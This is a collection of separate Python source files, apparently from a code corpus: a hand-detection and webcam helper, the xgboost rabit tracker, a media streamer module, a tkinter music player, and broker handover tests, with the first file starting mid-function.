tag['box'] = boxes[i].tolist()
tag["box_center"] = ( int((left + (right - left)/2 )) , int((top + (bottom - top)/2 )) )
tags.append(tag)
return tags
# Actual detection: generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
# Define input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name(
'detection_boxes:0')
# Each score represents the level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name(
'detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name(
'detection_classes:0')
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
image_np_expanded = np.expand_dims(image_np, axis=0)
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores,
detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
return np.squeeze(boxes), np.squeeze(scores), np.squeeze(classes).astype(np.int32)
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, image_np):
im_height, im_width, channels = image_np.shape
for i in range(num_hands_detect):
if (scores[i] > score_thresh):
(left, right, top, bottom) = (boxes[i][1] * im_width, boxes[i][3] * im_width,
boxes[i][0] * im_height, boxes[i][2] * im_height)
p1 = (int(left), int(top))
p2 = (int(right), int(bottom))
cv2.rectangle(image_np, p1, p2, (77, 255, 9), 3, 1)
def draw_box_on_image_id(tags, image_np):
for tag in tags:
cv2.putText(image_np, str(tag["id_label"]) , tag["box_center"],
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
cv2.putText(image_np, " " + str(tag["class"]), tag["box_center"],
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (255, 0, 9), 2)
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
cv2.putText(image_np, fps, (20, 50),
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (77, 255, 9), 2)
# Code to read camera input on a separate thread.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def size(self):
# return size of the capture device
return self.stream.get(3), self.stream.get(4)
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
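# Minimal usage sketch (not part of the original file) wiring the pieces above
# together. The checkpoint/label paths, class count and thresholds are placeholders.
def _example_detection_loop():
    graph, sess, category_index = load_inference_graph(
        NUM_CLASSES=1,
        PATH_TO_CKPT="frozen_inference_graph.pb",
        PATH_TO_LABELS="label_map.pbtxt",
    )
    stream = WebcamVideoStream(src=0, width=640, height=480).start()
    try:
        while True:
            frame = stream.read()
            boxes, scores, classes = detect_objects(frame, graph, sess)
            draw_box_on_image(num_hands_detect=2, score_thresh=0.5,
                              scores=scores, boxes=boxes, image_np=frame)
            cv2.imshow("detections", frame)
            if cv2.waitKey(1) & 0xFF == ord("q"):
                break
    finally:
        stream.stop()
        cv2.destroyAllWindows()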
|
tracker.py
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This script is a variant of dmlc-core/dmlc_tracker/tracker.py,
which is a specialized version for xgboost tasks.
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements, too-many-instance-attributes
import socket
import struct
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
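# Illustrative sketch (not part of the original file): the worker side of the
# handshake that SlaveEntry (below) services. It mirrors the reads in
# SlaveEntry.__init__: magic number, rank, world size, job id and command.
# The host, port and payload values are placeholders.
def _example_worker_handshake(host="127.0.0.1", port=9091):
    raw = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    raw.connect((host, port))
    sock = ExSocket(raw)
    sock.sendint(kMagic)              # tracker verifies and echoes the magic
    assert sock.recvint() == kMagic
    sock.sendint(-1)                  # rank (-1 lets the tracker assign one)
    sock.sendint(-1)                  # world size (-1 = unknown)
    sock.sendstr('NULL')              # job id
    sock.sendstr('start')             # command
    return sock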
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
assert magic == kMagic, f'invalid magic number={magic} from {self.host}'
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev not in (-1, rank):
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext not in (-1, rank):
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connections were successfully set up
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for _port in range(port, port_end):
try:
sock.bind((hostIP, _port))
self.port = _port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listening on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
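# Worked example (derived from the code above): ranks are laid out as a binary
# heap, so for nslave=7 the neighbours are
#   rank 0 -> [1, 2]      (root and its two children)
#   rank 1 -> [0, 3, 4]   (parent 0, children 3 and 4)
#   rank 3 -> [1]         (leaf, only its parent)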
def slave_envs(self):
"""
get environment variables for slaves;
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree;
returns a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if not cset:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
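# Worked example (derived from the code above): for nslave=3 the tree is
# 0 -> [1, 2], so find_share_ring() yields [0, 1, 2] and the resulting
# ring_map is {0: (2, 1), 1: (0, 2), 2: (1, 0)}, i.e. the ring 0 -> 1 -> 2 -> 0.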
def get_link_map(self, nslave):
"""
get the link map; this is a bit hacky and calls for a better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0: 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finished the job
shutdown = {}
# set of nodes that are waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that are pending to be assigned a rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Receive %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that are pending to get up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert todo_nodes
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Receive %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if not todo_nodes:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Receive %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finished the job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.daemon = True
self.thread.start()
def join(self):
while self.thread.is_alive():
self.thread.join(100)
def alive(self):
return self.thread.is_alive()
|
streamer.py
|
"""
Streamer for reading input
"""
# Copyright (C) 2021-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import abc
import multiprocessing
import queue
import sys
from enum import Enum
from pathlib import Path
from typing import Iterable, Iterator, List, NamedTuple, Optional, Tuple, Union
import cv2
import numpy as np
from natsort import natsorted
class MediaType(Enum):
"""
This Enum represents the types of input
"""
IMAGE = 1
VIDEO = 2
CAMERA = 3
class MediaExtensions(NamedTuple):
"""
This NamedTuple represents the extensions for input
"""
IMAGE: Tuple[str, ...]
VIDEO: Tuple[str, ...]
MEDIA_EXTENSIONS = MediaExtensions(
IMAGE=(".jpg", ".jpeg", ".png", ".ppm", ".bmp", ".pgm", ".tif", ".tiff", ".webp"),
VIDEO=(".avi", ".mp4"),
)
def get_media_type(path: Optional[Union[str, Path]]) -> MediaType:
"""
Get Media Type from the input path.
:param path: Path to file or directory.
Could be None, which implies camera media type.
"""
if isinstance(path, str):
path = Path(path)
media_type: MediaType
if path is None:
media_type = MediaType.CAMERA
elif path.is_dir():
if _get_filenames(path, MediaType.IMAGE):
media_type = MediaType.IMAGE
elif path.is_file():
if _is_file_with_supported_extensions(path, _get_extensions(MediaType.IMAGE)):
media_type = MediaType.IMAGE
elif _is_file_with_supported_extensions(path, _get_extensions(MediaType.VIDEO)):
media_type = MediaType.VIDEO
else:
raise ValueError("File extension not supported.")
else:
raise ValueError("File or folder does not exist")
return media_type
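# Example usage (paths are placeholders, following the doctest style used in the
# helper functions below):
#   >>> get_media_type("./demo.mp4")
#   <MediaType.VIDEO: 2>
#   >>> get_media_type(None)
#   <MediaType.CAMERA: 3>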
def _get_extensions(media_type: MediaType) -> Tuple[str, ...]:
"""
Get extensions of the input media type.
:param media_type: Type of the media. Either image or video.
:return: Supported extensions for the corresponding media type.
:example:
>>> _get_extensions(media_type=MediaType.IMAGE)
('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp')
>>> _get_extensions(media_type=MediaType.VIDEO)
('.avi', '.mp4')
"""
return getattr(MEDIA_EXTENSIONS, media_type.name)
def _is_file_with_supported_extensions(path: Path, extensions: Tuple[str, ...]) -> bool:
"""
Check if the file is supported for the media type
:param path: File path to check
:param extensions: Supported extensions for the media type
:example:
>>> from pathlib import Path
>>> path = Path("./demo.mp4")
>>> extensions = _get_extensions(media_type=MediaType.VIDEO)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.jpg")
>>> extensions = _get_extensions(media_type=MediaType.IMAGE)
>>> _is_file_with_supported_extensions(path, extensions)
True
>>> path = Path("demo.mp3")
>>> extensions = _get_extensions(media_type=MediaType.IMAGE)
>>> _is_file_with_supported_extensions(path, extensions)
False
"""
return path.suffix.lower() in extensions
def _get_filenames(path: Union[str, Path], media_type: MediaType) -> List[str]:
"""
Get filenames from a directory or a path to a file.
:param path: Path to the file or to the location that contains files.
:param media_type: Type of the media (image or video)
:example:
>>> path = "../images"
>>> _get_filenames(path, media_type=MediaType.IMAGE)
['images/4.jpeg', 'images/1.jpeg', 'images/5.jpeg', 'images/3.jpeg', 'images/2.jpeg']
"""
extensions = _get_extensions(media_type)
filenames: List[str] = []
if media_type == MediaType.CAMERA:
raise ValueError(
"Cannot get filenames for camera. Only image and video files are supported."
)
if isinstance(path, str):
path = Path(path)
if path.is_file():
if _is_file_with_supported_extensions(path, extensions):
filenames = [path.as_posix()]
else:
raise ValueError("Extension not supported for media type")
if path.is_dir():
for filename in path.rglob("*"):
if _is_file_with_supported_extensions(filename, extensions):
filenames.append(filename.as_posix())
filenames = natsorted(filenames) # type: ignore[assignment]
if len(filenames) == 0:
raise FileNotFoundError(f"No {media_type.name} file found in {path}!")
return filenames
def _read_video_stream(stream: cv2.VideoCapture) -> Iterator[np.ndarray]:
"""
Read video and yield the frame.
:param stream: Video stream captured via OpenCV's VideoCapture
:return: Individual frame
"""
while True:
frame_available, frame = stream.read()
if not frame_available:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
yield frame
stream.release()
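# Hedged usage sketch for _read_video_stream() above ("demo.mp4" is an
# illustrative path only):
#     >>> capture = cv2.VideoCapture("demo.mp4")
#     >>> for rgb_frame in _read_video_stream(capture):
#     ...     pass  # each frame is an RGB numpy array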
class BaseStreamer(metaclass=abc.ABCMeta):
"""
Base Streamer interface to implement Image, Video and Camera streamers.
"""
@abc.abstractmethod
def get_stream(self, stream_input):
"""
Get the streamer object, depending on the media type.
:param stream_input: Path to the stream, or
camera device index when capturing from a camera.
:return: Streamer object.
"""
raise NotImplementedError
@abc.abstractmethod
def __iter__(self) -> Iterator[np.ndarray]:
"""
Iterate through the streamer object that is a Python Generator object.
:return: Yield the image or video frame.
"""
raise NotImplementedError
def _process_run(streamer: BaseStreamer, buffer: multiprocessing.Queue):
"""
Private function that runs in a separate child process.
It retrieves frames from the streamer and puts them into the buffer,
blocking whenever the buffer is full.
:param streamer: The streamer to retrieve frames from
:param buffer: The buffer to place the retrieved frames in
"""
for frame in streamer:
buffer.put(frame)
class ThreadedStreamer(BaseStreamer):
"""
Runs a BaseStreamer in a separate daemon process.
:param streamer: The streamer to run on a thread
:param buffer_size: Number of frames to buffer internally
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
>>> threaded_streamer = ThreadedStreamer(streamer)
... for frame in threaded_streamer:
... pass
"""
def __init__(self, streamer: BaseStreamer, buffer_size: int = 2):
self.buffer_size = buffer_size
self.streamer = streamer
def get_stream(self, _=None) -> BaseStreamer:
return self.streamer
def __iter__(self) -> Iterator[np.ndarray]:
buffer: multiprocessing.Queue = multiprocessing.Queue(maxsize=self.buffer_size)
process = multiprocessing.Process(
target=_process_run, args=(self.get_stream(), buffer)
)
# Make the process a daemon so that it will exit when the main program exits as well
process.daemon = True
process.start()
try:
while process.is_alive() or not buffer.empty():
try:
yield buffer.get(timeout=0.1)
except queue.Empty:
pass
except GeneratorExit:
process.terminate()
finally:
process.join(timeout=0.1)
# Process.kill() is only available since Python 3.7.
# Skip it if running an older Python version.
if sys.version_info >= (3, 7) and process.exitcode is None:
process.kill()
class VideoStreamer(BaseStreamer):
"""
Video Streamer
:param path: Path to the video file or directory.
:example:
>>> streamer = VideoStreamer(path="../demo.mp4")
... for frame in streamer:
... pass
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.VIDEO
self.filenames = _get_filenames(path, media_type=MediaType.VIDEO)
def get_stream(self, stream_input: str) -> cv2.VideoCapture:
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
stream = self.get_stream(stream_input=filename)
yield from _read_video_stream(stream)
class CameraStreamer(BaseStreamer):
"""
Stream video frames from camera
:param camera_device: Camera device index, e.g. 0 or 1
:example:
>>> streamer = CameraStreamer(camera_device=0)
... for frame in streamer:
... cv2.imshow("Window", frame)
... if ord("q") == cv2.waitKey(1):
... break
"""
def __init__(self, camera_device: Optional[int] = None):
self.media_type = MediaType.CAMERA
self.camera_device = 0 if camera_device is None else camera_device
def get_stream(self, stream_input: int):
return cv2.VideoCapture(stream_input)
def __iter__(self) -> Iterator[np.ndarray]:
stream = self.get_stream(stream_input=self.camera_device)
yield from _read_video_stream(stream)
class ImageStreamer(BaseStreamer):
"""
Stream from image file or directory.
:param path: Path to an image or directory.
:example:
>>> streamer = ImageStreamer(path="../images")
... for frame in streamer:
... cv2.imshow("Window", frame)
... cv2.waitKey(0)
"""
def __init__(self, path: str) -> None:
self.media_type = MediaType.IMAGE
self.filenames = _get_filenames(path=path, media_type=MediaType.IMAGE)
@staticmethod
def get_stream(stream_input: str) -> Iterable[np.ndarray]:
image = cv2.imread(stream_input)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
yield image
def __iter__(self) -> Iterator[np.ndarray]:
for filename in self.filenames:
yield from self.get_stream(stream_input=filename)
def get_streamer(
path: Optional[str] = None,
camera_device: Optional[int] = None,
threaded: bool = False,
) -> BaseStreamer:
"""
Get streamer object based on the file path or camera device index provided.
:param path: Path to file or directory.
:param camera_device: Camera device index.
:param threaded: Threaded streaming option
"""
if path is not None and camera_device is not None:
raise ValueError(
"Both path and camera device is provided. Choose either camera or path to a image/video file."
)
media_type = get_media_type(path)
streamer: BaseStreamer
if path is not None and media_type == MediaType.IMAGE:
streamer = ImageStreamer(path)
elif path is not None and media_type == MediaType.VIDEO:
streamer = VideoStreamer(path)
elif media_type == MediaType.CAMERA:
if camera_device is None:
camera_device = 0
streamer = CameraStreamer(camera_device)
else:
raise ValueError("Unknown media type")
if threaded:
streamer = ThreadedStreamer(streamer)
return streamer
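# Hedged usage sketch for get_streamer() above (the path is illustrative only):
#     >>> streamer = get_streamer(path="../demo.mp4", threaded=True)
#     ... for frame in streamer:
#     ...     pass  # frames arrive as RGB numpy arrays of shape (H, W, 3)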
|
main.py
|
#!-*-coding:utf-8-*-
# !@Date: 2018/8/12 9:00
# !@Author: Liu Rui
# !@github: bigfoolliu
"""
tkinter + pygame + 所线程
一个线程用来播放音乐
另一个线程用来接收界面的操作
"""
from tkinter import *
import pygame
import threading
import time
class AppUI(object):
"""UI"""
def __init__(self):
# Define the main window
self.screen = Tk()
self.screen.title("生日歌播放器(by bigfoolliu)")
self.screen.resizable(width=False, height=False)
# Key statement: handler executed when the program window is closed
self.screen.protocol('WM_DELETE_WINDOW', self.close_window)
# Define the top and bottom areas
self.frame_top = Frame(self.screen, width=400, height=80, bg="white")
self.frame_down = Frame(self.screen, width=400, height=80, bg="white")
self.frame_top.propagate(0)
self.frame_down.propagate(0)
# Configure the size and position of the two areas
self.frame_top.pack(fill=BOTH, padx=5, pady=2.5)
self.frame_down.pack(fill=BOTH, padx=5, pady=2.5)
# Define the button and label variables
self.music_name = StringVar()
self.pause_resume = StringVar()
# Define the buttons and the label
self.label_display = Label(self.frame_top, bg="#2CA3A8", textvariable=self.music_name, font=("arial", 20))
self.button_start = Button(self.frame_down, text="Start", font=("arial", 15), bg="#91BEFE",
command=self.button_play_click)
self.button_pause = Button(self.frame_down, textvariable=self.pause_resume, font=("arial", 15), bg="#91BEFE",
command=self.pause_click)
# Set the initial button states
self.pause_resume.set("Pause")
self.button_pause["state"] = "disabled"
# Lay out the buttons and the label
self.label_display.pack(fill=BOTH, expand=1)
self.button_pause.pack(fill=BOTH, expand=1, side=LEFT, padx=2)
self.button_start.pack(fill=BOTH, expand=1, side=LEFT, padx=2)
self.play_flag = 0
def button_play_click(self):
"""按下播放按钮"""
# 创建线程来播放音乐,主线程用来播放音乐
self.play_flag = 1
play_threading = threading.Thread(target=self.play)
play_threading.daemon = False
play_threading.start()
# Update the button states
self.button_start["state"] = "disabled"
self.button_pause["state"] = "normal"
def play(self):
"""播放音乐以及显示歌词"""
pygame.mixer.init()
while self.play_flag: # the worker thread keeps polling the play flag
if not pygame.mixer.music.get_busy(): # if no music is currently playing
print("Now playing: It‘s your day.mp3...")
self.music_name.set("It‘s your day.mp3 playing...")
pygame.mixer.music.load("res/It‘s your day.mp3") # load the music file
pygame.mixer.music.play(1) # play once; playback is streamed, so execution continues while it plays
else:
time.sleep(0.2)
def pause_click(self):
"""暂停与重新开始播放"""
if self.pause_resume.get() == 'Pause':
pygame.mixer.music.pause()
self.pause_resume.set('Resume')
elif self.pause_resume.get() == 'Resume':
pygame.mixer.music.unpause()
self.pause_resume.set('Pause')
def close_window(self):
"""关闭窗口"""
self.play_flag = 0
try:
# Stop playback; stopping again after it has already stopped raises an exception, hence the try/except
pygame.mixer.music.stop()
pygame.mixer.quit()
except Exception:
print("Error while shutting down playback!")
self.screen.destroy()
if __name__ == '__main__':
app_ui = AppUI() # initialize the UI
app_ui.screen.mainloop()
|
handover.py
|
# Copyright (C) 2013 Sony Mobile Communications AB.
# All rights, including trade secret rights, reserved.
import json
import time
import traceback
from ave.network.process import Process
from ave.network.exceptions import *
from ave.broker._broker import validate_serialized, RemoteBroker, Broker
from ave.broker.session import RemoteSession
from ave.broker.exceptions import *
import setup
# check that a broker with trivial allocations can have its state serialized
@setup.brokers([],'master',[],False,False)
def t1(HOME, master):
pretty = '%s t1' % __file__
print(pretty)
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: trivial serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# like t1 but with some allocations
@setup.brokers([],'master',[],False,False)
def t2(HOME, master):
pretty = '%s t2' % __file__
print(pretty)
c1 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c1.get_resources({'type':'handset'}, {'type':'workspace'})
c2 = RemoteBroker(master.address, authkey=master.authkey, home=HOME.path)
c2.get_resources({'type':'handset'}, {'type':'relay'})
try:
s = master.serialize()
except Exception, e:
print('FAIL %s: serialization failed: %s' % (pretty, str(e)))
return False
try:
validate_serialized(s)
except Exception, e:
print('FAIL %s: could not validate adoption: %s' % (pretty, str(e)))
return False
return True
# trivial handover between two brokers: no allocations. more or less just check
# that the takeover can be started on the same port as the handover and that
# configuration data is the same
@setup.factory()
def t3(factory):
pretty = '%s t3' % __file__
print(pretty)
handover = factory.make_master('master')
adoption,config,fdtx_path = handover.begin_handover() # stops listening
try:
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
except Exception, e:
print('FAIL %s: could not start takeover: %s' % (pretty, str(e)))
return False
try:
handover.end_handover(1)
except ConnectionClosed:
pass
except Exception, e:
print('FAIL %s: unexpected error: %s' % (pretty, str(e)))
return False
# compare the config and serialization of the two
c = takeover.get_config()
if c != config:
print('FAIL %s: configuration mismatch: %s != %s' % (pretty, c, config))
return False
return True
# make a few allocations, then handover. check that both brokers show the same
# availability of equipment
@setup.factory()
def t4(factory):
pretty = '%s t4' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
# hand over
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
# check that availability is correct. stop the sessions started against the
# handover and check that the resources become available in the takeover
result = takeover.list_available()
if len(result) != len(avail_3):
print('FAIL %s: wrong avail 3: %s != %s' % (pretty, result, avail_3))
return False
ok = False
del(c2)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_2):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 2: %s != %s' % (pretty, result, avail_2))
return False
ok = False
del(c1)
for i in range(10): # allow some time for brokers to detect session death
result = takeover.list_available()
if len(result) == len(avail_1):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: wrong avail 1: %s != %s' % (pretty, result, avail_1))
return False
return True
# kill off one of the original sessions during the handover and check that the
# associated resources become available in the takeover
@setup.factory()
def t5(factory):
pretty = '%s t5' % __file__
print(pretty)
handover = factory.make_master('master')
avail_1 = handover.list_available()
# make some allocations
c1 = RemoteBroker(handover.address, home=factory.HOME.path)
h1,w1 = c1.get_resources({'type':'handset'}, {'type':'workspace'})
avail_2 = handover.list_available()
c2 = RemoteBroker(handover.address, home=factory.HOME.path)
h2,r2 = c2.get_resources({'type':'handset'}, {'type':'relay'})
avail_3 = handover.list_available()
adoption,config,fdtx_path = handover.begin_handover()
session = RemoteSession(h2.address, h2.authkey)
try:
session.crash() # kill the second session during the handover
except ConnectionClosed:
pass
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = takeover.list_available()
if len(result) != len(avail_2):
print('FAIL %s: wrong avail: %s != %s' % (pretty, result, avail_2))
return False
return True
# make sure one of the sessions is super busy during the handover so that it
# cannot engage in communication with the takeover during session adoption
@setup.factory()
def t6(factory):
pretty = '%s t6' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
r = RemoteBroker(address, home=factory.HOME.path)
h,w = r.get_resources({'type':'handset'}, {'type':'workspace'})
w.run('sleep 3') # right, extremely busy, but it prevents other action
while True:
time.sleep(1) # don't let the client die and lose all resources
p = Process(target=oob_client, args=(handover.address,))
p.start()
# make sure the oob client has gotten its resources
ok = False
for i in range(10):
if len(handover.list_available()) != len(avail):
ok = True
break
time.sleep(0.3)
if not ok:
print('FAIL %s: catastrophic' % pretty)
adoption,config,fdtx_path = handover.begin_handover()
takeover = factory.make_takeover('master', adoption, config, fdtx_path)
handover.end_handover(1)
result = True
if len(takeover.list_available()) == len(avail):
print('FAIL %s: wrong avail: %s' % (pretty, avail))
result = False
p.terminate()
p.join()
return result
# check that resources of super busy sessions are reclaimed when the session
# finally dies
@setup.factory()
def t7(factory):
pretty = '%s t7' % __file__
print(pretty)
handover = factory.make_master('master')
avail = handover.list_available()
def oob_client(address):
